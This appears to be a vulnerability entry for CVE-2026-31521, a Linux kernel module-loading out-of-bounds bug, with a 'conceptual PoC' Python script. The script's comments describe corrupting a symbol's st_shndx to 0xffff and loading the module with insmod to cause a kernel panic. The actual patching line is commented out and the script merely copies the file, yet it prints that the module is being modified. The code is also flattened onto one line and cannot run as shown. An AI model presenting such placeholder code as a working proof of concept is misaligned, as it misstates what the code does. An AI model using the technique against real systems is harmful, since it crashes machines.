CVE-2026-31521: Linux内核模块加载越界访问致崩溃

/* * Conceptual PoC for CVE-2026-31521 * This Python script modifies a valid Kernel Module (.ko) to trigger the vulnerability. * It corrupts the st_shndx field of a symbol to 0xffff (SHN_XINDEX). */ import struct import sys def create_poc_module(input_file, output_file): with open(input_file, 'rb') as f: data = bytearray(f.read()) # Note: In a real scenario, we must parse the ELF section headers to find # the exact offset of the symbol table (.symtab) and the specific symbol entry. # This is a conceptual representation of the modification. # Assume we found the offset of st_shndx for a symbol (e.g., offset 0x1000) # We set it to 0xffff to trigger the out-of-bounds access in simplify_symbols(). # st_shndx is a 2-byte field (uint16_t) at the end of the 64-bit Elf_Sym structure. # symbol_st_shndx_offset = 0x1234 (Example offset) # struct.pack_into('<H', data, symbol_st_shndx_offset, 0xffff) print(f"[+] Conceptually modifying {input_file} to set st_shndx=0xffff") print(f"[+] Saving to {output_file}") # For the purpose of this output, we just copy the file as a placeholder # because calculating the real offset requires a full ELF parser. with open(output_file, 'wb') as f: f.write(data) print("[*] To trigger: insmod", output_file) print("[*] Expected Result: Kernel panic - not syncing: Fatal exception") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python poc.py <input.ko> <output_poc.ko>") else: create_poc_module(sys.argv[1], sys.argv[2])